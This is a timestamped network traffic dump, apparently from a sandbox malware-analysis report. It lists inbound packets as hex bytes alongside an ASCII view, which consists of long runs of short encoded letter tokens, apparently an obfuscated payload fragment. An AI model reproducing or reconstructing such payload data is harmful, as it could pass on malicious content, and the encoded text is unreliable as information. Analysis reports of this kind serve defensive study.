2021-10-27 01:03:08 UTC	29	IN	Data Raw: 20 70 78 20 71 71 70 20 4f 6a 20 71 6a 20 71 71 6a 20 63 68 20 63 78 20 71 77 70 20 68 20 70 78 20 71 71 78 20 71 71 6a 20 71 71 77 20 71 65 71 20 71 70 70 20 71 6a 63 20 6a 77 20 71 71 71 20 77 71 20 71 71 77 20 71 68 65 20 71 68 63 20 77 65 20 65 71 49 20 78 70 20 63 68 20 63 78 20 77 68 20 71 71 4f 20 71 6a 4f 20 71 65 68 20 4f 49 20 63 68 20 78 70 20 78 70 20 6a 49 20 70 71 20 71 65 6a 20 71 68 68 20 71 68 63 20 65 6a 78 20 77 63 20 71 65 68 20 63 68 20 63 78 20 70 63 20 6a 20 49 71 20 71 68 4f 20 71 71 65 20 63 71 20 77 77 20 78 63 20 63 78 20 70 78 20 71 71 70 20 71 68 6a 20 71 68 78 20 71 65 71 20 6a 63 20 63 65 20 6a 77 20 71 71 68 20 65 68 49 20 71 71 20 77 71 20 71 68 4f 20 71 71 65 20 63 71 20 49 63 20 68 20 63 78 20 70 78 20 71 71 63 20 70 20 Data Ascii: px qqp Oj qj qqj ch cx qwp h px qqx qqj qqw qeq qpp qjc jw qqq wq qqw qhe qhc we eqI xp ch cx wh qqO qjO qeh OI ch xp xp jI pq qej qhh qhc ejx wc qeh ch cx pc j Iq qhO qqe cq ww xc cx px qqp qhj qhx qeq jc ce jw qqh ehI qq wq qhO qqe cq Ic h cx px qqc p
2021-10-27 01:03:08 UTC	30	IN	Data Raw: 4f 20 78 49 20 71 68 4f 20 71 71 65 20 63 49 20 65 77 20 78 4f 20 63 70 20 71 65 77 20 71 78 49 20 71 71 20 70 77 20 71 71 65 20 63 68 20 63 65 20 4f 6a 20 71 68 78 20 70 78 20 71 71 78 20 71 65 77 20 71 65 6a 20 4f 65 20 78 4f 20 65 65 20 65 63 20 71 68 65 20 77 71 20 71 71 4f 20 4f 78 20 71 63 71 20 4f 70 20 63 63 20 65 78 20 71 68 4f 20 63 78 20 70 78 20 71 65 68 20 71 65 68 20 71 68 68 20 71 71 20 6a 65 20 78 70 20 63 68 20 63 68 20 71 65 71 20 71 71 65 20 4f 78 20 70 77 20 71 65 68 20 63 4f 20 77 63 20 6a 63 20 63 78 20 70 78 20 71 71 70 20 65 78 4f 20 6a 77 20 71 71 65 20 63 68 20 78 4f 20 4f 6a 20 71 68 4f 20 70 78 20 71 71 78 20 71 65 77 20 71 68 71 20 71 65 71 20 77 6a 20 49 6a 20 63 68 20 63 78 20 70 68 20 65 63 78 20 77 71 20 71 68 4f 20 71 71 Data Ascii: O xI qhO qqe cI ew xO cp qew qxI qq pw qqe ch ce Oj qhx px qqx qew qej Oe xO ee ec qhe wq qqO Ox qcq Op cc ex qhO cx px qeh qeh qhh qq je xp ch ch qeq qqe Ox pw qeh cO wc jc cx px qqp exO jw qqe ch xO Oj qhO px qqx qew qhq qeq wj Ij ch cx ph ecx wq qhO qq
2021-10-27 01:03:08 UTC	31	IN	Data Raw: 78 20 71 71 70 20 70 20 71 65 49 20 71 71 65 20 63 68 20 63 65 20 63 70 20 6a 49 20 70 78 20 4f 20 70 78 20 71 68 4f 20 71 71 65 20 63 78 20 77 77 20 6a 70 20 63 78 20 70 78 20 71 71 70 20 71 68 6a 20 71 68 4f 20 71 71 20 71 49 20 78 70 20 63 68 20 63 68 20 4f 65 20 4f 68 20 4f 71 20 71 68 70 20 71 71 65 20 63 65 20 65 77 20 63 65 20 49 71 20 71 65 77 20 65 68 70 20 71 65 77 20 77 68 20 65 71 70 20 6a 65 20 63 71 20 65 49 20 71 6a 6a 20 70 78 20 71 71 78 20 71 65 77 20 49 78 20 65 63 71 20 65 6a 49 20 49 65 20 6a 65 20 63 6a 20 71 77 68 20 71 68 68 20 4f 4f 20 71 68 4f 20 71 71 65 20 78 71 20 4f 63 20 70 71 20 63 78 20 70 78 20 71 65 68 20 71 49 4f 20 71 4f 20 4f 65 20 63 68 20 78 70 20 63 78 20 70 4f 20 65 6a 63 20 71 71 78 20 71 71 77 20 71 68 6a 20 4f Data Ascii: x qqp p qeI qqe ch ce cp jI px O px qhO qqe cx ww jp cx px qqp qhj qhO qq qI xp ch ch Oe Oh Oq qhp qqe ce ew ce Iq qew ehp qew wh eqp je cq eI qjj px qqx qew Ix ecq ejI Ie je cj qwh qhh OO qhO qqe xq Oc pq cx px qeh qIO qO Oe ch xp cx pO ejc qqx qqw qhj O
2021-10-27 01:03:08 UTC	33	IN	Data Raw: 68 20 63 78 20 77 49 20 77 77 20 70 78 20 71 71 78 20 71 71 6a 20 65 65 63 20 70 68 20 63 68 20 78 70 20 63 71 20 70 4f 20 71 65 20 71 71 78 20 71 71 77 20 71 68 77 20 71 78 20 4f 20 78 70 20 63 68 20 63 68 20 71 71 49 20 78 20 70 78 20 71 70 4f 20 71 71 68 20 65 49 20 65 68 77 20 63 68 20 63 78 20 70 65 20 71 65 20 4f 20 71 68 4f 20 71 71 65 20 63 78 20 71 70 70 20 71 70 20 63 78 20 70 78 20 71 71 63 20 65 49 20 63 6a 20 71 71 65 20 63 68 20 63 78 20 77 49 20 71 6a 20 70 78 20 71 71 78 20 71 71 6a 20 77 77 20 65 4f 20 71 4f 20 65 65 78 20 78 78 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 71 78 20 77 4f 20 78 70 20 63 68 20 63 68 20 63 4f 20 78 65 20 71 71 77 20 71 68 4f 20 71 71 70 20 77 49 20 71 71 20 63 68 20 63 78 20 70 68 20 70 65 20 Data Ascii: h cx wI ww px qqx qqj eec ph ch xp cq pO qe qqx qqw qhw qx O xp ch ch qqI x px qpO qqh eI ehw ch cx pe qe O qhO qqe cx qpp qp cx px qqc eI cj qqe ch cx wI qj px qqx qqj ww eO qO eex xx jh qwq qqx qqw qhw qx wO xp ch ch cO xe qqw qhO qqp wI qq ch cx ph pe
2021-10-27 01:03:08 UTC	34	IN	Data Raw: 71 20 6a 70 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 4f 70 20 63 68 20 4f 4f 20 70 77 20 63 78 20 77 78 20 63 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 6a 6a 20 68 20 63 65 20 63 78 20 70 63 20 71 71 63 20 71 71 77 20 71 68 4f 20 4f 78 20 63 68 20 78 70 20 6a 63 20 6a 68 20 63 70 20 71 71 78 20 71 71 77 20 71 68 77 20 71 68 65 20 6a 68 20 63 77 20 65 68 20 78 4f 20 71 68 4f 20 71 6a 68 20 71 71 77 20 71 68 4f 20 71 71 65 20 65 63 20 63 71 20 63 77 20 65 4f 20 71 49 71 20 71 71 77 20 49 20 71 77 68 20 71 71 65 20 63 68 20 63 70 20 78 6a 20 71 65 20 71 6a 6a 20 71 71 78 20 71 71 77 20 71 68 4f 20 70 49 20 6a 63 20 63 6a 20 49 63 20 65 63 78 20 70 78 20 71 71 78 20 71 65 77 20 71 71 6a 20 77 78 20 65 78 70 20 78 70 20 63 68 20 63 78 20 71 71 78 20 4f Data Ascii: q jp px qqx qqw qhO Op ch OO pw cx wx ce qqw qhO qqj jj h ce cx pc qqc qqw qhO Ox ch xp jc jh cp qqx qqw qhw qhe jh cw eh xO qhO qjh qqw qhO qqe ec cq cw eO qIq qqw I qwh qqe ch cp xj qe qjj qqx qqw qhO pI jc cj Ic ecx px qqx qew qqj wx exp xp ch cx qqx O
2021-10-27 01:03:08 UTC	35	IN	Data Raw: 20 6a 20 71 63 77 20 71 65 49 20 4f 77 20 49 4f 20 71 68 78 20 71 71 65 20 65 6a 63 20 78 70 20 63 68 20 63 78 20 71 68 68 20 71 71 78 20 71 71 77 20 71 65 78 20 71 71 78 20 71 70 70 20 71 6a 63 20 6a 49 20 63 20 70 63 20 70 70 20 71 71 4f 20 71 65 6a 20 65 6a 78 20 77 63 20 65 20 63 68 20 63 78 20 70 63 20 6a 20 77 71 20 71 68 4f 20 71 71 65 20 63 71 20 6a 70 20 6a 68 20 6a 68 20 71 71 78 20 71 71 65 20 4f 70 20 65 78 77 20 78 20 63 49 20 78 70 20 63 68 20 78 63 20 77 78 20 4f 63 20 70 49 20 77 63 20 71 78 20 63 20 78 70 20 63 68 20 63 68 20 71 65 78 20 71 70 20 71 71 49 20 71 68 4f 20 71 71 70 20 78 6a 20 65 4f 20 78 49 20 71 49 20 77 49 20 71 71 65 20 65 63 71 20 65 71 70 20 71 68 6a 20 71 68 77 20 49 68 20 63 49 20 71 78 20 71 4f 70 20 71 71 78 20 71 Data Ascii: j qcw qeI Ow IO qhx qqe ejc xp ch cx qhh qqx qqw qex qqx qpp qjc jI c pc pp qqO qej ejx wc e ch cx pc j wq qhO qqe cq jp jh jh qqx qqe Op exw x cI xp ch xc wx Oc pI wc qx c xp ch ch qex qp qqI qhO qqp xj eO xI qI wI qqe ecq eqp qhj qhw Ih cI qx qOp qqx q
2021-10-27 01:03:08 UTC	37	IN	Data Raw: 65 20 63 78 20 4f 70 20 71 71 78 20 71 71 77 20 71 68 4f 20 49 49 20 63 68 20 78 70 20 6a 63 20 6a 49 20 70 63 20 71 71 65 20 71 71 68 20 71 65 65 20 4f 6a 20 65 77 20 65 65 20 65 65 49 20 71 70 77 20 70 78 20 71 71 78 20 71 71 49 20 49 4f 20 63 78 20 63 68 20 78 70 20 63 49 20 6a 65 20 63 4f 20 71 49 65 20 71 71 77 20 71 68 4f 20 71 65 65 20 6a 49 20 71 77 68 20 77 68 20 71 70 77 20 70 78 20 71 71 78 20 71 71 49 20 65 20 71 49 71 20 63 68 20 78 70 20 63 49 20 6a 68 20 71 6a 78 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 71 4f 20 78 6a 20 78 63 20 6a 71 20 63 71 20 71 71 78 20 70 70 20 70 6a 20 77 68 20 71 49 63 20 65 68 20 65 77 20 65 68 6a 20 63 78 20 70 78 20 4f 77 20 49 4f 20 71 68 78 20 71 71 65 20 71 68 65 20 78 70 20 63 68 20 63 78 20 71 68 6a 20 71 Data Ascii: e cx Op qqx qqw qhO II ch xp jc jI pc qqe qqh qee Oj ew ee eeI qpw px qqx qqI IO cx ch xp cI je cO qIe qqw qhO qee jI qwh wh qpw px qqx qqI e qIq ch xp cI jh qjx qqx qqw qhj qqO xj xc jq cq qqx pp pj wh qIc eh ew ehj cx px Ow IO qhx qqe qhe xp ch cx qhj q
2021-10-27 01:03:08 UTC	38	IN	Data Raw: 20 70 78 20 71 71 78 20 71 71 77 20 63 6a 20 71 65 6a 20 63 6a 20 63 49 20 6a 20 71 78 65 20 71 65 78 20 65 63 68 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 78 20 71 65 49 20 65 49 20 71 71 4f 20 70 63 20 71 71 78 20 71 71 63 20 71 65 6a 20 4f 78 20 63 49 20 65 78 20 71 71 63 20 63 63 20 70 78 20 71 71 49 20 4f 6a 20 71 77 4f 20 71 71 65 20 63 68 20 63 70 20 65 78 20 71 65 68 20 71 65 78 20 77 6a 20 71 71 49 20 71 68 4f 20 71 71 70 20 6a 71 20 78 4f 20 65 78 20 6a 68 20 71 6a 4f 20 71 71 78 20 71 71 77 20 71 68 6a 20 70 70 20 71 70 65 20 78 70 20 63 68 20 78 70 20 71 65 49 20 71 68 63 20 49 4f 20 71 71 68 20 71 71 65 20 49 49 20 78 70 20 63 68 20 63 78 20 4f 70 20 71 71 78 20 71 71 77 20 71 65 78 20 70 70 20 71 68 20 78 4f 20 63 68 20 78 70 20 71 65 71 20 Data Ascii: px qqx qqw cj qej cj cI j qxe qex ech qqw qhO qqp ex qeI eI qqO pc qqx qqc qej Ox cI ex qqc cc px qqI Oj qwO qqe ch cp ex qeh qex wj qqI qhO qqp jq xO ex jh qjO qqx qqw qhj pp qpe xp ch xp qeI qhc IO qqh qqe II xp ch cx Op qqx qqw qex pp qh xO ch xp qeq
2021-10-27 01:03:08 UTC	40	IN	Data Raw: 6a 68 20 71 6a 4f 20 71 71 78 20 71 71 77 20 71 68 6a 20 6a 71 20 65 71 70 20 78 70 20 63 68 20 49 68 20 77 6a 20 4f 63 20 4f 49 20 77 63 20 71 78 20 77 77 20 78 70 20 63 68 20 63 68 20 4f 65 20 70 65 20 71 68 71 20 77 78 20 71 71 65 20 63 68 20 65 78 20 71 4f 71 20 63 78 20 70 78 20 71 71 49 20 70 4f 20 4f 70 20 4f 71 20 78 4f 20 49 68 20 65 63 20 65 65 6a 20 71 65 78 20 71 77 6a 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 49 20 71 77 4f 20 63 68 20 63 78 20 70 65 20 4f 68 20 49 49 20 71 68 70 20 71 71 65 20 63 65 20 4f 20 71 70 65 20 63 78 20 70 78 20 71 71 78 20 71 71 78 20 77 77 20 71 49 6a 20 71 77 20 65 65 78 20 78 78 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 71 71 70 20 4f 6a 20 65 71 49 20 63 68 20 63 78 20 4f 78 20 71 65 77 20 71 Data Ascii: jh qjO qqx qqw qhj jq eqp xp ch Ih wj Oc OI wc qx ww xp ch ch Oe pe qhq wx qqe ch ex qOq cx px qqI pO Op Oq xO Ih ec eej qex qwj qqw qhO qee eI qwO ch cx pe Oh II qhp qqe ce O qpe cx px qqx qqx ww qIj qw eex xx jh qwq qqx qqw qhw qqp Oj eqI ch cx Ox qew q
2021-10-27 01:03:08 UTC	41	IN	Data Raw: 65 20 63 68 20 6a 63 20 65 20 63 6a 20 70 78 20 70 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 71 71 20 78 70 20 63 68 20 6a 4f 20 71 65 78 20 71 63 20 71 71 77 20 71 68 4f 20 71 71 70 20 6a 71 20 63 68 20 6a 77 20 65 70 20 71 65 78 20 71 6a 68 20 71 71 77 20 71 68 4f 20 71 65 65 20 49 63 20 71 4f 6a 20 63 68 20 63 78 20 4f 78 20 71 68 77 20 70 70 20 4f 49 20 70 49 20 63 6a 20 71 49 20 71 70 20 63 65 20 70 78 20 71 71 78 20 65 49 20 71 63 4f 20 71 71 65 20 63 68 20 63 70 20 65 78 20 49 71 20 71 65 77 20 71 6a 71 20 71 71 77 20 71 68 4f 20 4f 4f 20 65 20 63 71 20 63 68 20 71 65 20 70 78 20 71 71 78 20 71 71 77 20 70 77 20 71 71 65 20 63 68 20 6a 6a 20 71 70 20 71 78 77 20 71 71 4f 20 71 49 65 20 71 68 77 20 49 4f 20 71 78 6a 20 63 68 20 78 70 20 63 65 20 65 Data Ascii: e ch jc e cj px px qqw qhO qqe qq xp ch jO qex qc qqw qhO qqp jq ch jw ep qex qjh qqw qhO qee Ic qOj ch cx Ox qhw pp OI pI cj qI qp ce px qqx eI qcO qqe ch cp ex Iq qew qjq qqw qhO OO e cq ch qe px qqx qqw pw qqe ch jj qp qxw qqO qIe qhw IO qxj ch xp ce e
2021-10-27 01:03:08 UTC	42	IN	Data Raw: 4f 20 71 71 65 20 71 63 20 78 70 20 63 68 20 6a 4f 20 78 65 20 71 63 20 71 71 77 20 71 68 4f 20 71 71 49 20 71 70 20 65 65 78 20 65 65 20 65 6a 68 20 77 78 20 4f 68 20 71 6a 70 20 71 68 4f 20 71 71 65 20 63 65 20 65 78 20 71 63 78 20 63 78 20 70 78 20 71 65 68 20 71 68 78 20 49 78 20 71 65 6a 20 65 68 20 63 63 20 65 49 20 71 63 65 20 70 78 20 71 71 78 20 71 65 77 20 49 78 20 71 71 4f 20 65 63 20 63 71 20 63 77 20 65 4f 20 71 49 77 20 71 68 65 20 4f 63 20 71 68 49 20 70 70 20 65 68 71 20 78 70 20 63 68 20 49 68 20 77 77 20 4f 63 20 71 65 49 20 77 63 20 71 65 68 20 65 49 20 71 63 70 20 63 68 20 63 78 20 4f 78 20 4f 78 20 71 65 65 20 77 68 20 71 71 63 20 49 65 20 65 77 20 71 4f 6a 20 49 65 20 77 65 20 4f 63 20 71 71 70 20 77 63 20 71 77 78 20 65 6a 20 63 70 Data Ascii: O qqe qc xp ch jO xe qc qqw qhO qqI qp eex ee ejh wx Oh qjp qhO qqe ce ex qcx cx px qeh qhx Ix qej eh cc eI qce px qqx qew Ix qqO ec cq cw eO qIw qhe Oc qhI pp ehq xp ch Ih ww Oc qeI wc qeh eI qcp ch cx Ox Ox qee wh qqc Ie ew qOj Ie we Oc qqp wc qwx ej cp
2021-10-27 01:03:08 UTC	44	IN	Data Raw: 71 20 70 70 20 65 68 78 20 78 70 20 63 68 20 49 68 20 71 65 68 20 71 65 63 20 4f 78 20 71 68 77 20 71 65 78 20 65 63 20 65 71 65 20 49 6a 20 65 4f 20 71 4f 68 20 71 65 6a 20 71 65 63 20 65 20 71 78 6a 20 63 68 20 78 70 20 63 49 20 6a 68 20 65 49 20 71 71 63 20 71 71 77 20 71 68 77 20 4f 70 20 78 70 20 65 78 20 65 68 78 20 63 78 20 70 78 20 71 65 68 20 70 4f 20 71 68 49 20 71 65 71 20 63 70 20 4f 63 20 65 68 63 20 63 78 20 70 78 20 71 65 68 20 71 71 63 20 71 68 68 20 6a 71 20 63 68 20 78 4f 20 63 68 20 49 68 20 63 4f 20 65 6a 71 20 71 71 49 20 71 68 4f 20 71 71 70 20 63 65 20 65 49 20 63 68 20 63 78 20 70 78 20 71 68 63 20 49 4f 20 71 68 78 20 71 71 65 20 71 4f 68 20 78 70 20 63 68 20 63 78 20 65 68 20 71 71 78 20 71 71 77 20 71 65 78 20 71 78 20 77 6a 20 Data Ascii: q pp ehx xp ch Ih qeh qec Ox qhw qex ec eqe Ij eO qOh qej qec e qxj ch xp cI jh eI qqc qqw qhw Op xp ex ehx cx px qeh pO qhI qeq cp Oc ehc cx px qeh qqc qhh jq ch xO ch Ih cO ejq qqI qhO qqp ce eI ch cx px qhc IO qhx qqe qOh xp ch cx eh qqx qqw qex qx wj
2021-10-27 01:03:08 UTC	45	IN	Data Raw: 20 49 78 20 71 65 71 20 65 68 20 6a 70 20 65 49 20 71 77 49 20 70 78 20 71 71 78 20 71 71 63 20 77 68 20 71 71 63 20 65 68 20 65 77 20 71 4f 4f 20 65 70 20 70 78 20 71 70 68 20 71 71 20 6a 77 20 71 71 65 20 63 68 20 63 65 20 6a 49 20 4f 65 20 71 68 6a 20 71 71 63 20 4f 63 20 71 70 20 63 49 20 63 68 20 78 70 20 63 78 20 6a 68 20 70 65 20 71 71 63 20 71 71 77 20 71 68 6a 20 71 68 65 20 70 70 20 6a 20 78 65 20 6a 68 20 71 68 78 20 71 71 63 20 71 71 77 20 71 68 77 20 4f 65 20 63 63 20 65 78 20 77 78 20 63 78 20 70 78 20 71 71 49 20 4f 6a 20 70 68 20 71 71 6a 20 63 68 20 63 78 20 6a 68 20 63 71 20 71 65 78 20 71 71 20 71 71 77 20 71 68 4f 20 71 71 70 20 65 78 20 78 70 20 63 68 20 78 63 20 71 68 68 20 71 71 70 20 71 71 77 20 65 63 78 20 71 71 65 20 63 68 20 78 Data Ascii: Ix qeq eh jp eI qwI px qqx qqc wh qqc eh ew qOO ep px qph qq jw qqe ch ce jI Oe qhj qqc Oc qp cI ch xp cx jh pe qqc qqw qhj qhe pp j xe jh qhx qqc qqw qhw Oe cc ex wx cx px qqI Oj ph qqj ch cx jh cq qex qq qqw qhO qqp ex xp ch xc qhh qqp qqw ecx qqe ch x
2021-10-27 01:03:08 UTC	46	IN	Data Raw: 71 78 20 63 63 20 71 68 4f 20 71 71 65 20 6a 63 20 71 49 20 71 70 4f 20 71 4f 20 71 6a 65 20 71 68 70 20 4f 6a 20 71 78 49 20 71 71 65 20 63 68 20 63 78 20 78 70 20 6a 68 20 70 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 65 20 6a 68 20 65 77 20 65 68 20 65 65 20 71 65 70 20 70 77 20 71 49 63 20 71 71 63 20 70 70 20 65 68 63 20 78 70 20 63 68 20 78 70 20 70 6a 20 4f 68 20 65 65 4f 20 71 68 4f 20 71 71 65 20 63 65 20 78 49 20 6a 71 20 78 78 20 71 71 78 20 71 65 65 20 4f 6a 20 71 6a 77 20 71 71 65 20 63 68 20 63 70 20 78 49 20 65 77 20 77 71 20 70 78 20 71 68 68 20 71 68 63 20 71 71 63 20 4f 6a 20 63 49 20 63 71 20 63 78 20 4f 78 20 4f 78 20 4f 70 20 77 68 20 71 65 65 20 63 77 20 65 77 20 65 65 63 20 63 70 20 71 65 77 20 71 63 68 20 71 68 65 20 71 68 63 20 Data Ascii: qx cc qhO qqe jc qI qpO qO qje qhp Oj qxI qqe ch cx xp jh p qqx qqw qhj qhe jh ew eh ee qep pw qIc qqc pp ehc xp ch xp pj Oh eeO qhO qqe ce xI jq xx qqx qee Oj qjw qqe ch cp xI ew wq px qhh qhc qqc Oj cI cq cx Ox Ox Op wh qee cw ew eec cp qew qch qhe qhc
2021-10-27 01:03:08 UTC	48	IN	Data Raw: 20 71 71 78 20 71 65 77 20 49 4f 20 71 6a 6a 20 63 68 20 78 70 20 63 49 20 71 49 20 78 65 20 49 77 20 71 71 77 20 71 68 4f 20 71 71 49 20 65 49 20 71 49 71 20 63 68 20 63 78 20 70 65 20 4f 63 20 71 68 70 20 71 4f 20 49 63 20 63 68 20 78 70 20 63 78 20 6a 68 20 4f 78 20 71 71 63 20 71 71 77 20 71 68 6a 20 70 70 20 65 6a 77 20 78 70 20 63 68 20 49 68 20 78 65 20 49 77 20 71 71 77 20 71 68 4f 20 71 71 49 20 65 49 20 6a 6a 20 63 71 20 63 78 20 4f 78 20 71 65 20 71 68 6a 20 71 68 70 20 71 71 65 20 63 49 20 77 70 20 65 4f 20 63 78 20 70 78 20 71 71 70 20 4f 70 20 65 20 71 63 77 20 63 68 20 78 70 20 63 49 20 78 78 20 71 65 71 20 4f 77 20 70 6a 20 71 68 77 20 71 78 20 77 77 20 78 70 20 63 68 20 63 68 20 78 65 20 49 77 20 71 71 77 20 71 68 4f 20 71 71 49 20 4f 6a Data Ascii: qqx qew IO qjj ch xp cI qI xe Iw qqw qhO qqI eI qIq ch cx pe Oc qhp qO Ic ch xp cx jh Ox qqc qqw qhj pp ejw xp ch Ih xe Iw qqw qhO qqI eI jj cq cx Ox qe qhj qhp qqe cI wp eO cx px qqp Op e qcw ch xp cI xx qeq Ow pj qhw qx ww xp ch ch xe Iw qqw qhO qqI Oj
2021-10-27 01:03:08 UTC	49	IN	Data Raw: 20 49 49 20 71 71 65 20 63 68 20 63 65 20 6a 77 20 70 4f 20 71 70 63 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 77 20 6a 71 20 78 68 20 65 68 20 78 70 20 78 65 20 71 6a 20 71 71 77 20 71 68 4f 20 71 71 49 20 77 49 20 68 20 63 68 20 63 78 20 70 68 20 65 4f 20 71 68 65 20 71 68 70 20 71 71 65 20 63 49 20 65 78 20 71 49 71 20 63 78 20 70 78 20 71 71 49 20 71 77 71 20 77 78 20 71 65 65 20 65 63 20 65 71 78 20 65 6a 20 6a 68 20 65 78 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 68 77 20 6a 71 20 78 68 20 65 68 20 78 4f 20 71 71 49 20 71 65 6a 20 70 68 20 71 70 4f 20 71 71 68 20 65 49 20 65 68 77 20 63 68 20 63 78 20 70 65 20 4f 68 20 71 4f 6a 20 71 68 4f 20 71 71 65 20 63 65 20 65 78 20 70 6a 20 63 78 20 70 78 20 71 65 68 20 71 77 71 20 71 71 68 20 71 65 6a 20 Data Ascii: II qqe ch ce jw pO qpc qqx qqw qhj qhw jq xh eh xp xe qj qqw qhO qqI wI h ch cx ph eO qhe qhp qqe cI ex qIq cx px qqI qwq wx qee ec eqx ej jh ex qqx qqw qhj qhw jq xh eh xO qqI qej ph qpO qqh eI ehw ch cx pe Oh qOj qhO qqe ce ex pj cx px qeh qwq qqh qej
2021-10-27 01:03:08 UTC	50	IN	Data Raw: 20 71 68 68 20 4f 63 20 71 68 77 20 4f 68 20 77 49 20 68 20 63 71 20 6a 70 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 65 68 20 71 65 65 20 63 78 20 77 78 20 63 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 78 4f 20 68 20 63 49 20 63 78 20 77 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 6a 20 77 4f 20 71 71 71 20 70 70 20 71 65 78 20 70 49 20 4f 6a 20 6a 70 20 63 71 20 63 78 20 4f 78 20 49 20 63 71 20 71 68 4f 20 71 71 65 20 63 71 20 65 78 20 71 77 71 20 63 78 20 70 78 20 71 71 49 20 4f 63 20 77 63 20 4f 71 20 65 65 6a 20 78 70 20 63 68 20 63 78 20 70 77 20 49 49 20 71 65 77 20 71 68 4f 20 71 68 68 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 71 68 20 71 68 65 20 Data Ascii: qhh Oc qhw Oh wI h cq jp px qqx qqw qhO qqe ch qeh qee cx wx ce qqw qhO qqj xO h cI cx ww qqx qqw qhO qqe ch xp ch cj wO qqq pp qex pI Oj jp cq cx Ox I cq qhO qqe cq ex qwq cx px qqI Oc wc Oq eej xp ch cx pw II qew qhO qhh ch xp ch cx px qqx qqw qqh qhe
2021-10-27 01:03:08 UTC	52	IN	Data Raw: 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 71 70 63 20 71 70 77 20 63 78 20 70 70 20 63 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 6a 6a 20 68 20 63 78 20 63 78 20 65 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 63 77 20 63 68 20 78 70 20 6a 63 20 77 65 20 78 65 20 71 71 78 20 71 71 77 20 71 68 63 20 71 71 78 20 71 70 20 71 49 71 20 65 68 20 65 6a 68 20 77 78 20 4f 68 20 71 6a 70 20 71 68 4f 20 71 71 65 20 63 65 20 65 78 20 65 71 4f 20 63 78 20 70 78 20 71 65 68 20 4f 6a 20 71 4f 77 20 71 71 65 20 63 68 20 63 70 20 78 68 20 65 77 20 4f 63 20 70 78 20 71 71 63 20 49 4f 20 65 65 65 20 63 68 20 78 70 20 63 49 20 65 77 20 4f 63 20 70 4f 20 71 71 70 20 71 68 6a 20 4f 71 20 71 4f 6a 20 77 70 20 77 77 20 63 78 20 70 78 20 71 65 68 20 4f 63 20 71 68 77 Data Ascii: qqx qqw qhO qqe ch qpc qpw cx pp ce qqw qhO qqj jj h cx cx ex qqx qqw qhO cw ch xp jc we xe qqx qqw qhc qqx qp qIq eh ejh wx Oh qjp qhO qqe ce ex eqO cx px qeh Oj qOw qqe ch cp xh ew Oc px qqc IO eee ch xp cI ew Oc pO qqp qhj Oq qOj wp ww cx px qeh Oc qhw
2021-10-27 01:03:08 UTC	53	IN	Data Raw: 20 71 70 4f 20 71 78 77 20 63 78 20 70 6a 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 71 20 68 20 63 78 20 63 78 20 65 78 77 20 71 71 78 20 71 71 77 20 71 68 4f 20 63 4f 20 63 68 20 78 70 20 6a 63 20 77 65 20 6a 68 20 71 71 78 20 71 71 77 20 71 68 63 20 71 68 63 20 6a 71 20 63 77 20 65 68 20 49 65 20 71 65 78 20 65 63 71 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 63 20 63 71 20 49 65 20 65 4f 20 71 49 71 20 71 71 65 20 4f 6a 20 65 78 20 71 71 65 20 63 68 20 63 70 20 6a 68 20 63 71 20 71 6a 77 20 65 78 6a 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 71 49 20 71 71 6a 20 71 49 20 71 6a 65 20 71 68 70 20 4f 6a 20 71 78 49 20 71 71 65 20 63 68 20 63 78 20 77 49 20 77 6a 20 70 78 20 71 71 78 20 71 65 77 20 65 20 71 63 65 20 63 68 20 78 70 20 63 49 Data Ascii: qpO qxw cx pj qqx qqw qhO qqe xq h cx cx exw qqx qqw qhO cO ch xp jc we jh qqx qqw qhc qhc jq cw eh Ie qex ecq qqw qhO qee ec cq Ie eO qIq qqe Oj ex qqe ch cp jh cq qjw exj qqw qhO qqe xp qI qqj qI qje qhp Oj qxI qqe ch cx wI wj px qqx qew e qce ch xp cI
2021-10-27 01:03:08 UTC	54	IN	Data Raw: 68 20 6a 78 20 78 70 20 6a 68 20 63 78 20 71 71 78 20 71 71 77 20 71 68 6a 20 4f 6a 20 71 63 71 20 65 6a 70 20 49 68 20 6a 49 20 70 49 20 71 78 68 20 4f 4f 20 4f 4f 20 71 71 65 20 63 68 20 78 6a 20 4f 6a 20 70 63 20 70 78 20 71 71 78 20 71 65 77 20 71 77 77 20 4f 68 20 63 68 20 78 4f 20 78 49 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 70 70 20 71 71 65 20 49 68 20 71 71 63 20 63 68 20 65 70 20 71 70 20 71 71 78 20 71 71 77 20 71 68 70 20 71 71 78 20 63 68 20 63 49 20 63 68 20 77 68 20 78 78 20 71 71 78 20 71 65 6a 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 78 71 20 49 20 70 68 20 71 71 78 20 65 6a 49 20 71 68 4f 20 71 71 65 20 63 68 20 71 65 63 20 63 68 20 63 78 20 49 4f 20 71 65 20 77 4f 20 71 68 4f 20 71 71 65 20 63 78 20 4f 20 71 70 70 20 63 78 20 Data Ascii: h jx xp jh cx qqx qqw qhj Oj qcq ejp Ih jI pI qxh OO OO qqe ch xj Oj pc px qqx qew qww Oh ch xO xI cx px qqx qqw pp qqe Ih qqc ch ep qp qqx qqw qhp qqx ch cI ch wh xx qqx qej qhO qqe ch xp xq I ph qqx ejI qhO qqe ch qec ch cx IO qe wO qhO qqe cx O qpp cx
